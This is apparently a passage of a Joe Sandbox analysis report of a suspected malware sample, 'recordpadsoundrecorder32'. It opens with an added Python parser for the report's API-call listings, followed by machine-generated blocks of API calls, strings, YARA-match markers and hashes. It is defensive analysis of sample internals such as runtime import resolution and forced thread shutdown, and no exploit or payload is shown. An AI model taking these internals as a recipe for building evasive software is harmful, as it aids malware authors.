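The function listings above are machine-generated, but an analyst usually wants them as data: which function resolves which imports at run time through GetProcAddress, and which one carries the WaitForMultipleObjects / TerminateThread / QueueUserAPC shutdown sequence. The following Python is an added example and is not part of the Joe Sandbox report or of the analysed sample. The regular expression is an assumption about the listing format inferred from the lines visible in this report, the embedded SAMPLE text is excerpted from the two blocks above, and the behaviour tags at the end are illustrative heuristics of this example, not Joe Sandbox signatures.

```python
"""Parse Joe Sandbox 'APIs' function listings into structured call records.

Added example (not part of the report). CALL_RE is an assumption about the
listing format derived from the lines visible in this report.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Excerpt of two 'APIs' blocks from this report (the GetProcAddress resolver
# and the thread-shutdown routine), kept verbatim apart from indentation.
SAMPLE = """\
APIs
  • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02619291
  • Part of subcall function 026184B2: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 026192A4
  • __mtinitlocks.LIBCMT ref: 02615D49
  • GetCurrentThreadId.KERNEL32 ref: 02615DA0
Memory Dump Source
APIs
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02601CB1
  • CloseHandle.KERNEL32(?), ref: 02601CBA
  • TerminateThread.KERNEL32(?,00000000), ref: 02601CD4
  • QueueUserAPC.KERNEL32(02601E7C,?,00000000), ref: 02601CE1
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02601CEC
Memory Dump Source
"""

# One listing line: optional "Part of subcall function <addr>:" prefix,
# "<name>.<MODULE>", optional "(args)", then "ref: <addr>".
CALL_RE = re.compile(
    r"^\s*[•*-]\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[^\s(]+?)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]
    ref: str                  # address of the call site
    subcall: Optional[str]    # callee address when listed as a subcall, else None


def parse_blocks(text: str) -> List[List[ApiCall]]:
    """Split the text on 'APIs' headers; each block is one function's calls."""
    blocks: List[List[ApiCall]] = []
    current: Optional[List[ApiCall]] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        m = CALL_RE.match(line)
        if m and current is not None:
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            current.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"]))
    return blocks


def dynamically_resolved(calls: Iterable[ApiCall]) -> List[str]:
    """Export names passed to GetProcAddress as string constants.

    Joe Sandbox prints a recovered string argument literally, so a second
    argument that is not a hex value (or '?') is the resolved export name.
    """
    names: List[str] = []
    for c in calls:
        if c.name == "GetProcAddress" and len(c.args) >= 2:
            if not re.fullmatch(r"[0-9A-F?]+", c.args[1]):
                names.append(c.args[1])
    return names


# Illustrative heuristics (assumption of this example): a tag applies when
# every listed API appears in the same function block.
TAGS = {
    "forced thread shutdown": {"TerminateThread", "QueueUserAPC"},
    "runtime import resolution": {"GetProcAddress"},
}


def tag_block(calls: Iterable[ApiCall]) -> List[str]:
    """Return the sorted tags whose API set is fully present in the block."""
    present = {c.name for c in calls}
    return sorted(tag for tag, needed in TAGS.items() if needed <= present)


if __name__ == "__main__":
    for i, block in enumerate(parse_blocks(SAMPLE)):
        print(f"block {i}: {[c.name for c in block]}")
        print("  resolved:", dynamically_resolved(block))
        print("  tags:", tag_block(block))
```

Feeding a full report dump into parse_blocks gives one record list per function; grouping the GetProcAddress targets by the `subcall` address then recovers the resolver's complete import table without reading the listing by hand.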
                                                                                      APIs
                                                                                      • GetVersionExA.KERNEL32 ref: 00403F0B
                                                                                      • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403F40
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403FA0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                      • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                      • API String ID: 1385375860-4131005785
                                                                                      • Opcode ID: 902e60ade4d92a6391f73bc102fd9c1f1b848196a8b58942b8a92e566e39241b
                                                                                      • Instruction ID: f9b557e5926ae0cb1bea86ca91105dc92f8de38cdcecb6fe0ade7bda32980430
                                                                                      • Opcode Fuzzy Hash: 902e60ade4d92a6391f73bc102fd9c1f1b848196a8b58942b8a92e566e39241b
                                                                                      • Instruction Fuzzy Hash: B6312571D412886DEB319A705C45ADE7F7C8B06309F2400FBE685F62C2E6388FC98B19
                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 0261192F
                                                                                        • Part of subcall function 02612483: std::exception::_Copy_str.LIBCMT ref: 0261249C
                                                                                        • Part of subcall function 02610D00: __CxxThrowException@8.LIBCMT ref: 02610D5E
                                                                                      • std::exception::exception.LIBCMT ref: 0261198E
                                                                                      Strings
                                                                                      • boost unique_lock has no mutex, xrefs: 0261191E
                                                                                      • boost unique_lock owns already the mutex, xrefs: 0261197D
                                                                                      • $, xrefs: 02611993
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                                      • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                                      • API String ID: 2140441600-46888669
                                                                                      • Opcode ID: d1cb2065ba106fe8362820f07e6813301c766d2432c5f509d793058dde41f4c6
                                                                                      • Instruction ID: d015d34c6f66acba40f302f616180bb99ade262d61af8d4f97afce44df96722c
                                                                                      • Opcode Fuzzy Hash: d1cb2065ba106fe8362820f07e6813301c766d2432c5f509d793058dde41f4c6
                                                                                      • Instruction Fuzzy Hash: 0F2146B19097909FD710DF24C64475BBBE5BB89708F044E5DF8A587380D7B9A808CF96
                                                                                      APIs
                                                                                      • __getptd_noexit.LIBCMT ref: 02614A30
                                                                                        • Part of subcall function 02615C22: GetLastError.KERNEL32(00000000,?,02615E10,02612FE3,00000000,?,02618A7A,?,?,?,00000000,?,02618967,00000018,026316B8,00000008), ref: 02615C24
                                                                                        • Part of subcall function 02615C22: __calloc_crt.LIBCMT ref: 02615C45
                                                                                        • Part of subcall function 02615C22: __initptd.LIBCMT ref: 02615C67
                                                                                        • Part of subcall function 02615C22: GetCurrentThreadId.KERNEL32 ref: 02615C6E
                                                                                        • Part of subcall function 02615C22: SetLastError.KERNEL32(00000000,02618A7A,?,?,?,00000000,?,02618967,00000018,026316B8,00000008,026188B4,?,?,?,02615B38), ref: 02615C86
                                                                                      • __calloc_crt.LIBCMT ref: 02614A53
                                                                                      • __get_sys_err_msg.LIBCMT ref: 02614A71
                                                                                      • __invoke_watson.LIBCMT ref: 02614A8E
                                                                                      Strings
                                                                                      • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02614A3B, 02614A61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                                      • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                      • API String ID: 109275364-798102604
                                                                                      • Opcode ID: 5c1ee0a6588e5af3a817214a99da8c0d5df29adee920639c53be8d8a93d3d0e3
                                                                                      • Instruction ID: 78e7b23efe0546b46e2f9b8cc8b514d005b7c47f5dd49a9cf88f174d98bebaf7
                                                                                      • Opcode Fuzzy Hash: 5c1ee0a6588e5af3a817214a99da8c0d5df29adee920639c53be8d8a93d3d0e3
                                                                                      • Instruction Fuzzy Hash: D8F0E032500B655BE621A5195C4062B719DDB807A4B0E041DF945D7384EE21FD015A9C
                                                                                      APIs
                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02602350
                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02602360
                                                                                      • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02602370
                                                                                      • GetLastError.KERNEL32 ref: 0260237A
                                                                                        • Part of subcall function 02601712: __EH_prolog.LIBCMT ref: 02601717
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                                      • String ID: pqcs
                                                                                      • API String ID: 1619523792-2559862021
                                                                                      • Opcode ID: a08aa3b70d61f3b379b19cb6ace29cd23e7bfdee3c7565edb0166c32f869cec3
                                                                                      • Instruction ID: fe3aec9f0e845e4b8e3f37a308087ebb04c833af93d3bac5b72a06260cd9be41
                                                                                      • Opcode Fuzzy Hash: a08aa3b70d61f3b379b19cb6ace29cd23e7bfdee3c7565edb0166c32f869cec3
                                                                                      • Instruction Fuzzy Hash: 64F05470940704AFDB25AF749959FAFB7ACEF01701F014569FC05D3180EB70E9689B91
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02604035
                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 02604042
                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02604049
                                                                                      • std::exception::exception.LIBCMT ref: 02604063
                                                                                        • Part of subcall function 0260A678: __EH_prolog.LIBCMT ref: 0260A67D
                                                                                        • Part of subcall function 0260A678: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 0260A68C
                                                                                        • Part of subcall function 0260A678: __CxxThrowException@8.LIBCMT ref: 0260A6AB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                                      • String ID: bad allocation
                                                                                      • API String ID: 3112922283-2104205924
                                                                                      • Opcode ID: 68fb3fda1f6e1816194d3c39f78b1730712be83b640c50f993f2c8f95170df42
                                                                                      • Instruction ID: c7afe769896b00f1e5e801bfb3cf83ed2590de8657b1b46f91abee32ab56872e
                                                                                      • Opcode Fuzzy Hash: 68fb3fda1f6e1816194d3c39f78b1730712be83b640c50f993f2c8f95170df42
                                                                                      • Instruction Fuzzy Hash: A7F08CB1E44619EBDB24EFE0DA08FAFB778EB08300F804559E916A2280DB34565C8F95
                                                                                      APIs
                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00403D6D
                                                                                      • GetFileType.KERNEL32(00000800), ref: 00403E13
                                                                                      • GetStdHandle.KERNEL32(-000000F6), ref: 00403E6C
                                                                                      • GetFileType.KERNEL32(00000000), ref: 00403E7A
                                                                                      • SetHandleCount.KERNEL32 ref: 00403EB1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileHandleType$CountInfoStartup
                                                                                      • String ID:
                                                                                      • API String ID: 1710529072-0
                                                                                      • Opcode ID: dbaca84f47ceea487b5a59e7f7eb21175bc7ba2e308e601fb33fec27d5f53662
                                                                                      • Instruction ID: 9dbc4695f3205ced207c781c98d2c2eecf37425ec268f2c04ee58d1a3995b9ba
                                                                                      • Opcode Fuzzy Hash: dbaca84f47ceea487b5a59e7f7eb21175bc7ba2e308e601fb33fec27d5f53662
                                                                                      • Instruction Fuzzy Hash: 7C5143716046458BD7218F38CD887663FA8AF02B26F15473EE4A2FB2E0C7389A45C74D
                                                                                      APIs
                                                                                        • Part of subcall function 02611A00: CloseHandle.KERNEL32(00000000,3DC92DE0), ref: 02611A51
                                                                                        • Part of subcall function 02611A00: WaitForSingleObject.KERNEL32(?,000000FF,3DC92DE0,?,?,?,?,3DC92DE0,026119D3,3DC92DE0), ref: 02611A68
                                                                                      • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02611CCE
                                                                                      • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02611CEE
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02611D27
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02611D7B
                                                                                      • SetEvent.KERNEL32(?), ref: 02611D82
                                                                                        • Part of subcall function 0260418C: CloseHandle.KERNEL32(00000000,?,02611CB5), ref: 026041B0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 4166353394-0
                                                                                      • Opcode ID: d7e9774498cd994ec6adca0cbc5c0ca767ff400198080c7407e658819e40cc43
                                                                                      • Instruction ID: c17c3a4ae73f171774f0cfe411a613735b6b85ea23ccbed7bcf31da111943a19
                                                                                      • Opcode Fuzzy Hash: d7e9774498cd994ec6adca0cbc5c0ca767ff400198080c7407e658819e40cc43
                                                                                      • Instruction Fuzzy Hash: CA41DE70A007118BDB259F28DC80B2BB7A4EF46724F1806A8ED18DB385D734E8169BE5
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0260E0AB
                                                                                        • Part of subcall function 02601A01: TlsGetValue.KERNEL32 ref: 02601A0A
                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0260E12A
                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 0260E146
                                                                                      • InterlockedIncrement.KERNEL32(02635190), ref: 0260E16B
                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 0260E180
                                                                                        • Part of subcall function 026027F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 0260284E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                                      • String ID:
                                                                                      • API String ID: 1578506061-0
                                                                                      • Opcode ID: 74ac9768f1e4feef1e408909670001f102e3d0e137a7236be4d718399d642681
                                                                                      • Instruction ID: 9910552a10c25ff3dfc9888eee2830540402ab81f09f190501dd28506408e52e
                                                                                      • Opcode Fuzzy Hash: 74ac9768f1e4feef1e408909670001f102e3d0e137a7236be4d718399d642681
                                                                                      • Instruction Fuzzy Hash: D23149B1D016159FCB24DFA8C584AAEBBF8BF08310F04495ED849D7680E775AA08DFA4
                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 02620360
                                                                                        • Part of subcall function 02612F5C: __FF_MSGBANNER.LIBCMT ref: 02612F73
                                                                                        • Part of subcall function 02612F5C: __NMSG_WRITE.LIBCMT ref: 02612F7A
                                                                                        • Part of subcall function 02612F5C: RtlAllocateHeap.NTDLL(00870000,00000000,00000001), ref: 02612F9F
                                                                                      • _free.LIBCMT ref: 02620373
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap_free_malloc
                                                                                      • String ID:
                                                                                      • API String ID: 1020059152-0
                                                                                      • Opcode ID: 4950088763e86cd67396291913b222fe5cfe26fa4e29d7171cfd89f72daf93d9
                                                                                      • Instruction ID: d8cc060db3026676ffc266e510bd80e2bfb60be6314f10f184c240eefe3de019
                                                                                      • Opcode Fuzzy Hash: 4950088763e86cd67396291913b222fe5cfe26fa4e29d7171cfd89f72daf93d9
                                                                                      • Instruction Fuzzy Hash: CA11E772948E33AFCB312F70AA4475E76A9AF10360F044529FD0ACB280DB309498CED8
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 026021DA
                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 026021ED
                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02602224
                                                                                      • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02602237
                                                                                      • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02602261
                                                                                        • Part of subcall function 02602341: InterlockedExchange.KERNEL32(?,00000001), ref: 02602350
                                                                                        • Part of subcall function 02602341: InterlockedExchange.KERNEL32(?,00000001), ref: 02602360
                                                                                        • Part of subcall function 02602341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02602370
                                                                                        • Part of subcall function 02602341: GetLastError.KERNEL32 ref: 0260237A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1856819132-0
                                                                                      • Opcode ID: 14ca31d0c6a1b8e04032c95c8a0b5cabb0d9964621d109111dc2d3c91f401577
                                                                                      • Instruction ID: c5f97f167ab0299968bb36cb528664898092eb4cfb37a9afa6aa223c03032339
                                                                                      • Opcode Fuzzy Hash: 14ca31d0c6a1b8e04032c95c8a0b5cabb0d9964621d109111dc2d3c91f401577
                                                                                      • Instruction Fuzzy Hash: A91184B1D40114EBCB1A9FA4D898AAFFFBAFF48310F00451AEC15922A0D7714595EF85
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0260229D
                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 026022B0
                                                                                      • TlsGetValue.KERNEL32 ref: 026022E7
                                                                                      • TlsSetValue.KERNEL32(?), ref: 02602300
                                                                                      • TlsSetValue.KERNEL32(?,?,?), ref: 0260231C
                                                                                        • Part of subcall function 02602341: InterlockedExchange.KERNEL32(?,00000001), ref: 02602350
                                                                                        • Part of subcall function 02602341: InterlockedExchange.KERNEL32(?,00000001), ref: 02602360
                                                                                        • Part of subcall function 02602341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02602370
                                                                                        • Part of subcall function 02602341: GetLastError.KERNEL32 ref: 0260237A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1856819132-0
                                                                                      • Opcode ID: 7fa94755b3b11c5df519be942b68c26679521773df4e408465de6dddee98098e
                                                                                      • Instruction ID: a396d4db2194aee25705ae523c38dc763a5e94cd633c2b29a3f542655e250184
                                                                                      • Opcode Fuzzy Hash: 7fa94755b3b11c5df519be942b68c26679521773df4e408465de6dddee98098e
                                                                                      • Instruction Fuzzy Hash: 57115EB1D00118ABCB1A9FA4D884AAEFFBAFF48310F04451AEC05A3250DB7159A5DF94
                                                                                      APIs
                                                                                        • Part of subcall function 0260B113: __EH_prolog.LIBCMT ref: 0260B118
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0260BCDD
                                                                                        • Part of subcall function 0261450A: RaiseException.KERNEL32(?,?,0260FB0D,?,?,?,?,?,?,?,0260FB0D,?,02630F68,?), ref: 0261455F
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02631D84,?,00000001), ref: 0260BCF3
                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 0260BD06
                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02631D84,?,00000001), ref: 0260BD16
                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0260BD24
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                                      • String ID:
                                                                                      • API String ID: 2725315915-0
                                                                                      • Opcode ID: 7c48190282883e1130f3246a82e9ebc112d40c3cc29025609fe909a74c5a3989
                                                                                      • Instruction ID: b7ba25c80293229474f6c23aa486129176e0bc783ed84e2ded1b2a9ee16c13c2
                                                                                      • Opcode Fuzzy Hash: 7c48190282883e1130f3246a82e9ebc112d40c3cc29025609fe909a74c5a3989
                                                                                      • Instruction Fuzzy Hash: 5001D6B2A40244BFDB249AA0DCC9F8BB7ACEB04718F088914F625D71C0D760E8488B14
                                                                                      APIs
                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02602432
                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02602445
                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 02602454
                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02602469
                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 02602470
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                      • String ID:
                                                                                      • API String ID: 747265849-0
                                                                                      • Opcode ID: 6734f8f7e924c3f23b7d18515970d77aae9634e5d665c3f717a24537cc90b014
                                                                                      • Instruction ID: 5b5425d664cf72e39eebdd508f6e8d8d3830de838573a4ac7c438197ceaad22f
                                                                                      • Opcode Fuzzy Hash: 6734f8f7e924c3f23b7d18515970d77aae9634e5d665c3f717a24537cc90b014
                                                                                      • Instruction Fuzzy Hash: 7DF06DB2640604BBD7159AA0ED89F9AB72CFF04701F805411F701D6080D761B968CBA1
                                                                                      APIs
                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 02601ED2
                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02601EEA
                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 02601EF9
                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02601F0E
                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 02601F15
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                      • String ID:
                                                                                      • API String ID: 830998967-0
                                                                                      • Opcode ID: 2e373ff4de3d73aa16af108b1286b0904ee73619b8c64684f315aec84407d52e
                                                                                      • Instruction ID: 94b25520c481e7ff6a440c86ad5623bd8705faf28a15d50de07a2595825623ac
                                                                                      • Opcode Fuzzy Hash: 2e373ff4de3d73aa16af108b1286b0904ee73619b8c64684f315aec84407d52e
                                                                                      • Instruction Fuzzy Hash: D0F06DB2541A04BBD712AFA0EC88FCAB72CFF04341F001415F60186440C771A5A88BE0
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memmove
                                                                                      • String ID: invalid string position$string too long
                                                                                      • API String ID: 4104443479-4289949731
                                                                                      • Opcode ID: 4acceb84b91498a4568c93e2e623eff17cfa202d0b21f9e1ddf51f1e3f44323e
                                                                                      • Instruction ID: 9574e916472680b25a27557abd60d376011e4bf363c398b5401b5d6b3455afb9
                                                                                      • Opcode Fuzzy Hash: 4acceb84b91498a4568c93e2e623eff17cfa202d0b21f9e1ddf51f1e3f44323e
                                                                                      • Instruction Fuzzy Hash: 4641C131300304ABDB3CDE69D8C4A5BBBAAEB41754B14092DE856877C1CBB0F805DBA8
                                                                                      APIs
                                                                                      • WSASetLastError.WS2_32(00000000), ref: 026030C3
                                                                                      • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02603102
                                                                                      • _memcmp.LIBCMT ref: 02603141
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressErrorLastString_memcmp
                                                                                      • String ID: 255.255.255.255
                                                                                      • API String ID: 1618111833-2422070025
                                                                                      • Opcode ID: 95e45255d76cc67861791c855ea8d4547077d1b168aaef5ae3c111bc7118561a
                                                                                      • Instruction ID: 9152d3cb199b0df8d2d5cfd332c4c05cbfd85baca6aea3448c5de5788658da38
                                                                                      • Opcode Fuzzy Hash: 95e45255d76cc67861791c855ea8d4547077d1b168aaef5ae3c111bc7118561a
                                                                                      • Instruction Fuzzy Hash: A23101719003049FDB249F64C8C0B6FB7A1AF49325F1545ADEC55973C0DB71A891CB80
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02601F5B
                                                                                      • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02601FC5
                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 02601FD2
                                                                                        • Part of subcall function 02601712: __EH_prolog.LIBCMT ref: 02601717
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                      • String ID: iocp
                                                                                      • API String ID: 998023749-976528080
                                                                                      • Opcode ID: 3182ed3a120c447e55c5238b52ffebf3ab4f5d5577c256eb0168d50b468067a3
                                                                                      • Instruction ID: d1edbb2326904db3938f884ea789f34fc7d422efeae9754155301d9a34a327ab
                                                                                      • Opcode Fuzzy Hash: 3182ed3a120c447e55c5238b52ffebf3ab4f5d5577c256eb0168d50b468067a3
